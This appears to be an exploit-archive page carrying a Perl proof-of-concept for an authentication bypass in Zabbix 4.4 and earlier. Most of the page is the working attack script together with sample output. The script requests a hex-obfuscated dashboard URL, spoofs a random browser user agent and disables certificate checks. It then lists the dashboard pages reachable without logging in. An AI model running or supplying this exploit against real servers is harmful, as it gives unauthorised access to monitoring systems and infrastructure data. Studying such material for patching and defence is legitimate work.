Zabbix 4.4 Authentication Bypass

2019.10.07
Credit: Todor Donev
Risk: Low
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

#!/usr/bin/perl -w # # Zabbix <= 4.4 Authentication Bypass Demo PoC Exploit # # Copyright 2019 (c) Todor Donev <todor.donev at gmail.com> # # # [ Zabbix <= 4.4 Authentication Bypass Demo PoC Exploit # # [ Exploit Author: Todor Donev 2019 <todor.donev@gmail.com> # # [ Initializing the browser # # [ >>> Referer => # # [ >>> User-Agent => Opera/9.61 (Macintosh; Intel Mac OS X; U; de) Presto/2.1.1 # # [ >>> Content-Type => application/x-www-form-urlencoded # # [ <<< Cache-Control => no-store, no-cache, must-revalidate # # [ <<< Connection => close # # [ <<< Date => Mon, 07 Oct 2019 12:29:54 GMT # # [ <<< Pragma => no-cache # # [ <<< Server => nginx # # [ <<< Vary => Accept-Encoding # # [ <<< Content-Type => text/html; charset=UTF-8 # # [ <<< Expires => Thu, 19 Nov 1981 08:52:00 GMT # # [ <<< Client-Date => Mon, 07 Oct 2019 12:29:54 GMT # # [ <<< Client-Peer => # # [ <<< Client-Response-Num => 1 # # [ <<< Client-SSL-Cert-Issuer => # # [ <<< Client-SSL-Cert-Subject => # # [ <<< Client-SSL-Cipher => ECDHE-RSA-AES128-GCM-SHA256 # # [ <<< Client-SSL-Socket-Class => IO::Socket::SSL # # [ <<< Client-SSL-Warning => Peer certificate not verified # # [ <<< Client-Transfer-Encoding => chunked # # [ <<< Link => <favicon.ico>; rel="icon"<assets/img/apple-touch-icon-76x76-precomposed.png>; rel="apple-touch-icon-precomposed"; sizes="76x76"<assets/img/apple-touch-icon-120x120-precomposed.png>; rel="apple-touch-icon-precomposed"; sizes="120x120"<assets/img/apple-touch-icon-152x152-precomposed.png>; rel="apple-touch-icon-precomposed"; sizes="152x152"<assets/img/apple-touch-icon-180x180-precomposed.png>; rel="apple-touch-icon-precomposed"; sizes="180x180"<assets/img/touch-icon-192x192.png>; rel="icon"; sizes="192x192"<assets/styles/dark-theme.css>; rel="stylesheet"; type="text/css" # # [ <<< Set-Cookie => zbx_sessionid=e125efe43b1f67b0fdbfb4db2fa1ce0d; HttpOnlyPHPSESSID=n4dolnd118fhio9oslok6qpj3a; path=/zabbix/; HttpOnlyPHPSESSID=n4dolnd118fhio9oslok6qpj3a; path=/zabbix/; HttpOnly # # [ <<< Strict-Transport-Security => max-age=63072000; includeSubdomains; preload # # [ <<< Title => TARGET: Dashboard # # [ <<< X-Content-Type-Options => nosniff # # [ <<< X-Frame-Options => SAMEORIGIN # # [ <<< X-Meta-Author => Zabbix SIA # # [ <<< X-Meta-Charset => utf-8 # # [ <<< X-Meta-Csrf-Token => fdbfb4db2fa1ce0d # # [ <<< X-Meta-Msapplication-Config => none # # [ <<< X-Meta-Msapplication-TileColor => #d40000 # # [ <<< X-Meta-Msapplication-TileImage => assets/img/ms-tile-144x144.png # # [ <<< X-Meta-Viewport => width=device-width, initial-scale=1 # # [ <<< X-UA-Compatible => IE=Edge # # [ <<< X-XSS-Protection => 1; mode=block # # [ # # [ The target is vulnerable. Try to open these links: # # [ https://TARGET/zabbix/zabbix.php?action=dashboard.view # # [ https://TARGET/zabbix/zabbix.php?action=dashboard.view&ddreset=1 # # [ https://TARGET/zabbix/zabbix.php?action=problem.view&ddreset=1 # # [ https://TARGET/zabbix/overview.php?ddreset=1 # # [ https://TARGET/zabbix/zabbix.php?action=web.view&ddreset=1 # # [ https://TARGET/zabbix/latest.php?ddreset=1 # # [ https://TARGET/zabbix/charts.php?ddreset=1 # # [ https://TARGET/zabbix/screens.php?ddreset=1 # # [ https://TARGET/zabbix/zabbix.php?action=map.view&ddreset=1 # # [ https://TARGET/zabbix/srv_status.php?ddreset=1 # # [ https://TARGET/zabbix/hostinventoriesoverview.php?ddreset=1 # # [ https://TARGET/zabbix/hostinventories.php?ddreset=1 # # [ https://TARGET/zabbix/report2.php?ddreset=1 # # [ https://TARGET/zabbix/toptriggers.php?ddreset=1 # # [ https://TARGET/zabbix/zabbix.php?action=dashboard.list # # [ https://TARGET/zabbix/zabbix.php?action=dashboard.view&dashboardid=1 # use strict; use HTTP::Request; use LWP::UserAgent; use WWW::UserAgent::Random; use HTML::TreeBuilder; my $host = shift || ''; # Full path url to the store $host =~ s|/$||; print "\033[2J"; #clear the screen print "\033[0;0H"; #jump to 0,0 print "[ Zabbix <= 4.4 Authentication Bypass Demo PoC Exploit\n"; print "[ Exploit Author: Todor Donev 2019 <todor.donev\@gmail.com>\n"; print "[ e.g. perl $0 https://target:port/\n" and exit if ($host !~ m/^http/); print "[ Initializing the browser\n"; my $user_agent = rand_ua("browsers"); my $browser = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 }); $browser->timeout(30); $browser->agent($user_agent); my $target = $host."\x2f\x7a\x61\x62\x62\x69\x78\x2f\x7a\x61\x62\x62\x69\x78\x2e\x70\x68\x70\x3f\x61\x63\x74\x69\x6f\x6e\x3d\x64\x61\x73\x68\x62\x6f\x61\x72\x64\x2e\x76\x69\x65\x77\x26\x64\x61\x73\x68\x62\x6f\x61\x72\x64\x69\x64\x3d\x31"; my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded",Referer => $host]); my $response = $browser->request($request); print "[ >>> $_ => ", $request->header($_), "\n" for $request->header_field_names; print "[ <<< $_ => ", $response->header($_), "\n" for $response->header_field_names; print "[ Exploit failed! 401 Unauthorized!\n" and exit if ($response->code eq '401'); print "[ Exploit failed! 403 Forbidden!\n" and exit if ($response->code eq '403'); if (defined ($response->as_string()) && ($response->as_string() =~ m/Dashboard/)){ print "[\n[ The target is vulnerable. Try to open these links:\n"; my $tree = HTML::TreeBuilder->new_from_content($response->as_string()); my @files = $tree->look_down(_tag => 'a'); for my $line (@files){ next if ($line->attr('href') =~ m/javascript/); next if ($line->attr('href') =~ m/\#/); next if ($line->attr('href') =~ m/http/); print "[ ", $host."/zabbix/".$line->attr('href'), "\n"; } } else { print "[ Exploit failed! The target isn't vulnerable\n"; exit; }


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top